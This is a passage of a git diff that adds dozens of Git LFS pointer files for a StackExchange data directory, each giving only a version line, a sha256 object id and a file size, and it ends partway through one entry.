a/data/stackexchange/1-1/1204_2289.jsonl b/data/stackexchange/1-1/1204_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b76b08163794d5f29a479af23e470380c1ce5483 --- /dev/null +++ b/data/stackexchange/1-1/1204_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:009acc011dc781fb563c173f9682c3bdde18d1bd1c5ec4af884721d8f6e3981a +size 37739180 diff --git a/data/stackexchange/1-1/1205_2289.jsonl b/data/stackexchange/1-1/1205_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4bfc1e26f5ca6485d6da81a6e145f6407bcaa8a2 --- /dev/null +++ b/data/stackexchange/1-1/1205_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a35839a9977a696065175c476ca056f07e9aeb3fc43e9fa7f8a29ec820b0cb2b +size 37943353 diff --git a/data/stackexchange/1-1/1206_2289.jsonl b/data/stackexchange/1-1/1206_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e75a8452f9e76dab647a27b9133fb9de001b969 --- /dev/null +++ b/data/stackexchange/1-1/1206_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96f602fcd1de532084ab8f28aa30b010d58330dd99f5d09d01ad859a49b852ec +size 37342752 diff --git a/data/stackexchange/1-1/1207_2289.jsonl b/data/stackexchange/1-1/1207_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32e31715cf52d6de716e22e9bfecc8d1805a3588 --- /dev/null +++ b/data/stackexchange/1-1/1207_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f0424e72706b88003d753f96d9887ef2d9457b7cba4b8a4c561d83819cf0704 +size 37560487 diff --git a/data/stackexchange/1-1/1208_2289.jsonl b/data/stackexchange/1-1/1208_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b8b334176a1e4097a3c3c086a51d420a7ae0d51 --- /dev/null +++ b/data/stackexchange/1-1/1208_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c3366842708ed5b9264ac14ea0e75fd969e28fa5a6bc30146b23affb79c2aa +size 38303521 diff --git a/data/stackexchange/1-1/1209_2289.jsonl b/data/stackexchange/1-1/1209_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ef5d770cedec16dd5c6d638551e4a6ea36d1dbe --- /dev/null +++ b/data/stackexchange/1-1/1209_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:060f788b926bfba9a66ac996acc68c90440049bd4d64402270899bd14ffe6a69 +size 37755380 diff --git a/data/stackexchange/1-1/120_2289.jsonl b/data/stackexchange/1-1/120_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..baa82298dba583c4a97d002bad0f6d0712870f52 --- /dev/null +++ b/data/stackexchange/1-1/120_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4ee1bf89fdcf396d24faa7272ec8035a5478b97c48a3c1f42eba237387df012 +size 33540981 diff --git a/data/stackexchange/1-1/1210_2289.jsonl b/data/stackexchange/1-1/1210_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7462b2077ef9b06a1df7dfcd39cade3876dc249 --- /dev/null +++ b/data/stackexchange/1-1/1210_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5177e83b12067ac8b46b7bb8284a9822371698a00b9d907fe91f8b6a9745f8db +size 37507549 diff --git a/data/stackexchange/1-1/1211_2289.jsonl b/data/stackexchange/1-1/1211_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19872cf5721fe3276b96f1f11f3947ddc152492b --- /dev/null +++ b/data/stackexchange/1-1/1211_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45b479ef078bcfc6aa8cd0c41eab41244885f17a6a87ff8a0e85a295dce228a9 +size 37358801 diff --git a/data/stackexchange/1-1/1212_2289.jsonl b/data/stackexchange/1-1/1212_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41c094b2c1fd3e0a2df8c0ee7ef2de06b9262429 --- /dev/null +++ b/data/stackexchange/1-1/1212_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c4773ef50c42fa87a5e7b449265e36ab35289bedabd4dafcc152fc5301d89dd7 +size 37536756 diff --git a/data/stackexchange/1-1/1213_2289.jsonl b/data/stackexchange/1-1/1213_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6bb65fb1fb8af54f38160caab0efe0f9108deecd --- /dev/null +++ b/data/stackexchange/1-1/1213_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b37f0da326d2516bf9afe5d6a3639959b2bc296e66607ee1a7a13ab5da5e8420 +size 37888187 diff --git a/data/stackexchange/1-1/1214_2289.jsonl b/data/stackexchange/1-1/1214_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1e84df371a7d0f79594ecee2f324566fe372167 --- /dev/null +++ b/data/stackexchange/1-1/1214_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9709372e7ec7035dd8834de5ca8954e00a608793f042d65d695a9575f0783bdb +size 37814407 diff --git a/data/stackexchange/1-1/1215_2289.jsonl b/data/stackexchange/1-1/1215_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2f9e8311b5babd733fba5f613f4414aaf86e047 --- /dev/null +++ b/data/stackexchange/1-1/1215_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7008dc9980b7717f2b7df67ad57d7ae56ea9540a6da8876d47f294d4bddb8f70 +size 37810200 diff --git a/data/stackexchange/1-1/1216_2289.jsonl b/data/stackexchange/1-1/1216_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fb2c7abb10938dd2636233a4343f4b1c8b9b7fc --- /dev/null +++ b/data/stackexchange/1-1/1216_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e72f45ab73ad8056f7d251716ae7f94094b20af588979f242436390a869b6e08 +size 37974415 diff --git a/data/stackexchange/1-1/1217_2289.jsonl b/data/stackexchange/1-1/1217_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5262d5190dbadc00c59116b0f16e95762cce0b19 --- /dev/null +++ b/data/stackexchange/1-1/1217_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11db6d2e4227f109a9748694bc16ce51122d640c410cc5cb267eb496af33e5ba +size 37310745 diff --git a/data/stackexchange/1-1/1218_2289.jsonl b/data/stackexchange/1-1/1218_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..933655d57388a7a3a8106845cca1b7d550bd3683 --- /dev/null +++ b/data/stackexchange/1-1/1218_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f8a16db909e70ce1192be4990f0f1f17cc3b416d1826eadf6a119ba5d1acc79 +size 38378966 diff --git a/data/stackexchange/1-1/1219_2289.jsonl b/data/stackexchange/1-1/1219_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82781b9624f42c50c8e2ffb7cafe9146568716a8 --- /dev/null +++ b/data/stackexchange/1-1/1219_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e7202eadb78e1a313535d97f34c8190907945444bbd0d1db1e51d981c7d2928 +size 37662769 diff --git a/data/stackexchange/1-1/121_2289.jsonl b/data/stackexchange/1-1/121_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4070c5210000e1d512799da93f32bbe053197eb --- /dev/null +++ b/data/stackexchange/1-1/121_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f2434944c2b4468dac11d57b142f719dd4bdf7fe4e1b0b2b05e3304dbe42393 +size 33646594 diff --git a/data/stackexchange/1-1/1220_2289.jsonl b/data/stackexchange/1-1/1220_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1262c3e0b3593d8c8686652b22aa66b818558d8c --- /dev/null +++ b/data/stackexchange/1-1/1220_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34db630cf2a5f82fefb78bcf4970333331d8c673365efb42df1ca2c2ca89e4f7 +size 37514209 diff --git a/data/stackexchange/1-1/1221_2289.jsonl b/data/stackexchange/1-1/1221_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a87f508e2163a943a75ecd45904e2110ed1209c --- /dev/null +++ b/data/stackexchange/1-1/1221_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbeb54eca0562c87a4fa7a19d90b2d6f12f9f5346da2f36a6202b499f1f5826d +size 37433271 diff --git a/data/stackexchange/1-1/1222_2289.jsonl b/data/stackexchange/1-1/1222_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..141179919c18bfbac9c9cb52f7e7f0bbc37fe81a --- /dev/null +++ b/data/stackexchange/1-1/1222_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8aae3bcd60e8299d53f4e50378288638bff00628decc3390533d68452da95805 +size 38564329 diff --git a/data/stackexchange/1-1/1223_2289.jsonl b/data/stackexchange/1-1/1223_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e379464813cb2703105af0c43d7753eb6c3ec780 --- /dev/null +++ b/data/stackexchange/1-1/1223_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:92574eb34c0aa81607a02b537d8d00e767a081e34a1f166fea137abe7accc887 +size 38060040 diff --git a/data/stackexchange/1-1/1224_2289.jsonl b/data/stackexchange/1-1/1224_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f77990081362cfcd4de6c1539f515e8c1805c10e --- /dev/null +++ b/data/stackexchange/1-1/1224_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6dd078d55c2ef885c6d70c9c56b87bebd4aaa07d9143afb60f9d542eac2283fc +size 37731182 diff --git a/data/stackexchange/1-1/1225_2289.jsonl b/data/stackexchange/1-1/1225_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4c580fbda715d6ed5abc98e62cad1e18fb962cb --- /dev/null +++ b/data/stackexchange/1-1/1225_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcb061982d6aedd852d71070464532dcef20b05e15045e224e632f18ccd17771 +size 37779918 diff --git a/data/stackexchange/1-1/1226_2289.jsonl b/data/stackexchange/1-1/1226_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..667a90ee06bfd5244e8b0eb104e184fa948bdc79 --- /dev/null +++ b/data/stackexchange/1-1/1226_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ecf614eda025b3acdd95acc0b54a26b1a320fd03782e4fbf6c644756488158f +size 38094943 diff --git a/data/stackexchange/1-1/1227_2289.jsonl b/data/stackexchange/1-1/1227_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37b0702084683e5b3d2ba6589b94fff97e67638a --- /dev/null +++ b/data/stackexchange/1-1/1227_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:337b9395021257b69a7ddea50853621fad8554382f6039c64607f850f5f82048 +size 38590866 diff --git a/data/stackexchange/1-1/1228_2289.jsonl b/data/stackexchange/1-1/1228_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c14963bd385b5c1c900d93069a5cf948a4130495 --- /dev/null +++ b/data/stackexchange/1-1/1228_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0ae828606d28e18a064fb82e6417dc0933a48028eceea3d70e4ccb6e39933ad +size 37742207 diff --git a/data/stackexchange/1-1/1229_2289.jsonl b/data/stackexchange/1-1/1229_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78689e04088d536d88ca5ae08f1e61ec99e35209 --- /dev/null +++ b/data/stackexchange/1-1/1229_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f2148ce64830464e69030e27e6ba8436b396c8745addbbb29ccfb48185131e8 +size 37559129 diff --git a/data/stackexchange/1-1/122_2289.jsonl b/data/stackexchange/1-1/122_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..110e609ecac10c176f093d91a30e768d706cbf54 --- /dev/null +++ b/data/stackexchange/1-1/122_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:18ef145c6008b7c18264548e290fcf09fc9f98d9bc383bc9a18ec9911b248859 +size 33833843 diff --git a/data/stackexchange/1-1/1230_2289.jsonl b/data/stackexchange/1-1/1230_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d66d57eaf2c723daeaab9121d86fdcf3dd054767 --- /dev/null +++ b/data/stackexchange/1-1/1230_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55d69c18975a3ab7a6d400d3a4a9fca6c9fe343da2b86b00dd954e587dbec98e +size 37790821 diff --git a/data/stackexchange/1-1/1231_2289.jsonl b/data/stackexchange/1-1/1231_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7ea607af0fde4a301bd86ddac4c5cbbc0f1e460 --- /dev/null +++ b/data/stackexchange/1-1/1231_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b71f1faa571b1a4511e2beed6f32837abffa0fa93f2952932919ec7d9da55d77 +size 37726135 diff --git a/data/stackexchange/1-1/1232_2289.jsonl b/data/stackexchange/1-1/1232_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a7d5c849ba031a1ba48b84c06f347398282ebae --- /dev/null +++ b/data/stackexchange/1-1/1232_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee2a43fba229353d96a81c9378d082a03de781381b7b89e81692c0805ad50fab +size 38026700 diff --git a/data/stackexchange/1-1/1233_2289.jsonl b/data/stackexchange/1-1/1233_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3dfe0561f313f9659279ca1e056ba6d3d3ff78a5 --- /dev/null +++ b/data/stackexchange/1-1/1233_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c539028c82b915b2223f50a93bf46ef81ffeae30c87b78140c920fe79738a933 +size 37964347 diff --git a/data/stackexchange/1-1/1234_2289.jsonl b/data/stackexchange/1-1/1234_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2e9e52a9ca00b2a9c789208612abb7937b74533 --- /dev/null +++ b/data/stackexchange/1-1/1234_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9abf44f8398e2429d5e6233234820974855aea1d1e9c9decd6d0d830115563dd +size 37739524 diff --git a/data/stackexchange/1-1/1235_2289.jsonl b/data/stackexchange/1-1/1235_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..666a3c47d4525fea95ce01825b11031f291cde7e --- /dev/null +++ b/data/stackexchange/1-1/1235_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:830695bdf73c524f81a9f9ecbd680521499e63c24497e0e8f9f0e8ddf4e48c2e +size 37717490 diff --git a/data/stackexchange/1-1/1236_2289.jsonl b/data/stackexchange/1-1/1236_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1577390225612104a9cafb3f7787fc3ea3c261b --- /dev/null +++ b/data/stackexchange/1-1/1236_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5f41266f3d8fa4dfe4cdcff9bc06174523dff6b0e9f906ef2ef2361cc63c516 +size 37354951 diff --git a/data/stackexchange/1-1/1237_2289.jsonl b/data/stackexchange/1-1/1237_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0b67b48edc7cda9cd1699d60b16d27f107ce04b9 --- /dev/null +++ b/data/stackexchange/1-1/1237_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:769d44557fbaf02db53e346b505843e83afb95f5dc6118ee0741b5d1f246d375 +size 37816330 diff --git a/data/stackexchange/1-1/1238_2289.jsonl b/data/stackexchange/1-1/1238_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..155aa5dd456955a2bb8f4735a67c06ad2cf39f3b --- /dev/null +++ b/data/stackexchange/1-1/1238_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aea1692881d1205b9b5d655bf95e5304b82d8d433bbf2a8f1a918974eafdc70f +size 37532905 diff --git a/data/stackexchange/1-1/1239_2289.jsonl b/data/stackexchange/1-1/1239_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59f22fd8b7c3d87f5a1d924d10887cb8b748e5a9 --- /dev/null +++ b/data/stackexchange/1-1/1239_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a6d636c489eae6beb9ec898582ab04afeaabc088c129ec1fe96dc65759112323 +size 34833121 diff --git a/data/stackexchange/1-1/123_2289.jsonl b/data/stackexchange/1-1/123_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54a3f896ceab576b028131db9200a3150559087a --- /dev/null +++ b/data/stackexchange/1-1/123_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4020ec72b21bade6f32c429f27d7a2064520cdd6a708eae482accf3c8b024f63 +size 33553263 diff --git a/data/stackexchange/1-1/1240_2289.jsonl b/data/stackexchange/1-1/1240_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..975376d1be0788124d92fbd5986223e923538c74 --- /dev/null +++ b/data/stackexchange/1-1/1240_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93462f69e92ff351a6468466221c9bc1b7e97429158586feee8f425c6b92d0ab +size 35299263 diff --git a/data/stackexchange/1-1/1241_2289.jsonl b/data/stackexchange/1-1/1241_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42df8052fb5422d64d81bf87fbf34f25c67bf4ec --- /dev/null +++ b/data/stackexchange/1-1/1241_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f247e8bff3a4393fec9b361d531974490017923c55de3d87674f54cf10f9218c +size 34914726 diff --git a/data/stackexchange/1-1/1242_2289.jsonl b/data/stackexchange/1-1/1242_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3ec62cd0f3339d84732a606f915025ed4468f65 --- /dev/null +++ b/data/stackexchange/1-1/1242_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:772bc77ea0bc57a41dce5345601ac02849330122fa35cc3c20138e79aec17e30 +size 35377677 diff --git a/data/stackexchange/1-1/1243_2289.jsonl b/data/stackexchange/1-1/1243_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c65bcdbf925d193f10c1094d2b37c1fba179d61a --- /dev/null +++ b/data/stackexchange/1-1/1243_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a11bc261f4b6134ea003a2e7e4fc1f4b0eade8e149b0ccb3cdea23db501dbb3 +size 34750052 diff --git a/data/stackexchange/1-1/1244_2289.jsonl b/data/stackexchange/1-1/1244_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07926573068bcbd574adb469b02be82b09267663 --- /dev/null +++ b/data/stackexchange/1-1/1244_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42c3e78fcbeb597417a97f47648112616a2b186ce649b6dda9b64da5d95f518d +size 35014034 diff --git a/data/stackexchange/1-1/1245_2289.jsonl b/data/stackexchange/1-1/1245_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da2d9459826327b38b7efa7af4af9edb85a533d9 --- /dev/null +++ b/data/stackexchange/1-1/1245_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e782fe4c50458ae8cd1d5557aebc2c290bfc516a65f24bbec56d3c1f206f216d +size 34946018 diff --git a/data/stackexchange/1-1/1246_2289.jsonl b/data/stackexchange/1-1/1246_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ae1199bb866b1f1fcf8f1b13049acbb8d58afc7 --- /dev/null +++ b/data/stackexchange/1-1/1246_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4439b5468b11ae8b8399d697f9329ef9dc682c5fb6963e59571ef84053e72fd8 +size 34796762 diff --git a/data/stackexchange/1-1/1247_2289.jsonl b/data/stackexchange/1-1/1247_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e2daf1e8f3471cd2b615c29a6c6ec91d06129e2 --- /dev/null +++ b/data/stackexchange/1-1/1247_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b75b2125ad1fa37f2a532f13b7919307570b5dc1b558fd41b8771ae62aca0777 +size 34417237 diff --git a/data/stackexchange/1-1/1248_2289.jsonl b/data/stackexchange/1-1/1248_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7f1d2fe15ed1c3c4f7d287222a34d32312c4b90c --- /dev/null +++ b/data/stackexchange/1-1/1248_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9fb96b6c029a382946f0caa8d7ae78891d17b654785e69f5f1d793099b43da1 +size 35698589 diff --git a/data/stackexchange/1-1/1249_2289.jsonl b/data/stackexchange/1-1/1249_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4de6b0c013b43a96c3c8180b529ace24119d2b90 --- /dev/null +++ b/data/stackexchange/1-1/1249_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:674947f694e667cc5a82567663fcf5ca55f62696f3a644cdbe3a278d335c2f1c +size 34836839 diff --git a/data/stackexchange/1-1/124_2289.jsonl b/data/stackexchange/1-1/124_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d72f94974da1add30c744668b91846d78a3a3f10 --- /dev/null +++ b/data/stackexchange/1-1/124_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66cde3a3ab7fa12bd0058d1424e11e88ae1c5e481da095bbad76f94b7be9450b +size 33251086 diff --git a/data/stackexchange/1-1/1250_2289.jsonl b/data/stackexchange/1-1/1250_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2cc5b9628e45bf545c970a59f6242f8558fc053 --- /dev/null +++ b/data/stackexchange/1-1/1250_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0dec0ce9d838a36a0b817a2af40fbefa858710e2e57c995a1d8d318d2af5a37 +size 35389391 diff --git a/data/stackexchange/1-1/1251_2289.jsonl b/data/stackexchange/1-1/1251_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0fdb8c198c88ddba23d8b210036f41825512d43 --- /dev/null +++ b/data/stackexchange/1-1/1251_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0537d59afe4c18cac1ff1e1c5c841aaf5ccaf3d7c714315d7363e1b823eaa129 +size 34479882 diff --git a/data/stackexchange/1-1/1252_2289.jsonl b/data/stackexchange/1-1/1252_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1135c8b72b55fe25aaf25a9b1c9bd22b3088e61 --- /dev/null +++ b/data/stackexchange/1-1/1252_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8080299ca0fdc366e6a1f93f84c7852a962daacb0d5cb4a33afd7665f31753d1 +size 35383000 diff --git a/data/stackexchange/1-1/1253_2289.jsonl b/data/stackexchange/1-1/1253_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..297f2c9cb0ddfec594a4d19815ba686e0eda0105 --- /dev/null +++ b/data/stackexchange/1-1/1253_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab1362be1ae8f4471790ad8eedc8a23dc35aa08be0fe7b3f76972f04b0bb1857 +size 35273259 diff --git a/data/stackexchange/1-1/1254_2289.jsonl b/data/stackexchange/1-1/1254_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1429acd26eddfb9d1e257b03898f1d30dbeba48 --- /dev/null +++ b/data/stackexchange/1-1/1254_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c69a9eb7d6d1d2b8c603bb2405336c137370b40111dccc087c51a8925bb0ce5 +size 34765193 diff --git a/data/stackexchange/1-1/1255_2289.jsonl b/data/stackexchange/1-1/1255_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..def0c06e0ba23909bf39c3c1ad466ba8e5fae8ec --- /dev/null +++ b/data/stackexchange/1-1/1255_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c93a5fbad7d6bac7e3609bf238092124a617cd181168c85c97865b0feb8e3dcc +size 35319235 diff --git a/data/stackexchange/1-1/1256_2289.jsonl b/data/stackexchange/1-1/1256_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9011fdcdfd2fc626ad9294c8c566f23ac088abea --- /dev/null +++ b/data/stackexchange/1-1/1256_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7991328d60f3414dbcdac2723e99e303024f1f2717e4169f392014a48f32584 +size 34734748 diff --git a/data/stackexchange/1-1/1257_2289.jsonl b/data/stackexchange/1-1/1257_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5194a1692c3d8466469a2514cf9b3485b2e24c66 --- /dev/null +++ b/data/stackexchange/1-1/1257_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:078976a7c539a25ff412c83cdad70f362755904b09ec2e1a2a2af3a9f7ceaa33 +size 34277770 diff --git a/data/stackexchange/1-1/1258_2289.jsonl b/data/stackexchange/1-1/1258_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..edfdaa9e2f97401c6af60dcfef0663c99858d571 --- /dev/null +++ b/data/stackexchange/1-1/1258_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:612db88d2b3d42a5f89ab3c81aa7051d3137f4ad68a8a53c6bec3f97c6aaa1a0 +size 35049802 diff --git a/data/stackexchange/1-1/1259_2289.jsonl b/data/stackexchange/1-1/1259_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12a7af80dda08e480849993d97d72585e990ceed --- /dev/null +++ b/data/stackexchange/1-1/1259_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6bc68ac248cdfffc22130787fc7b352ef1d31771b305a85ba45fb73c5747df55 +size 34554079 diff --git a/data/stackexchange/1-1/125_2289.jsonl b/data/stackexchange/1-1/125_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2fc780e4ec47ad0882dcd41de57f307a61b769f8 --- /dev/null +++ b/data/stackexchange/1-1/125_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f985447d36481e27902ba14773cc82fbb7630bcb899a1e6f901530a53bb563ad +size 33770618 diff --git a/data/stackexchange/1-1/1260_2289.jsonl b/data/stackexchange/1-1/1260_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4a554761a41f131ef102b0cdb5409417013440f --- /dev/null +++ b/data/stackexchange/1-1/1260_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fda7d8b608ce563d2e87524a72346901fcdc54babef3c6b92d2f4009203b4d91 +size 35178455 diff --git a/data/stackexchange/1-1/1261_2289.jsonl b/data/stackexchange/1-1/1261_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..104893d2f333c6699554c128cfc31e58a4b34e05 --- /dev/null +++ b/data/stackexchange/1-1/1261_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:00596feb398ee99618fcbfc6c329792ba261507c831cabeeeed1969c18983655 +size 34897837 diff --git a/data/stackexchange/1-1/1262_2289.jsonl b/data/stackexchange/1-1/1262_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..901ad4092b793acb13760c9fa719bfc57bb426a6 --- /dev/null +++ b/data/stackexchange/1-1/1262_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e12d7f91b6b69e42015879f005727e1798011183b93ca8ee201811fe6e7e7b5d +size 34850202 diff --git a/data/stackexchange/1-1/1263_2289.jsonl b/data/stackexchange/1-1/1263_2289.jsonl new file mode 100644 index 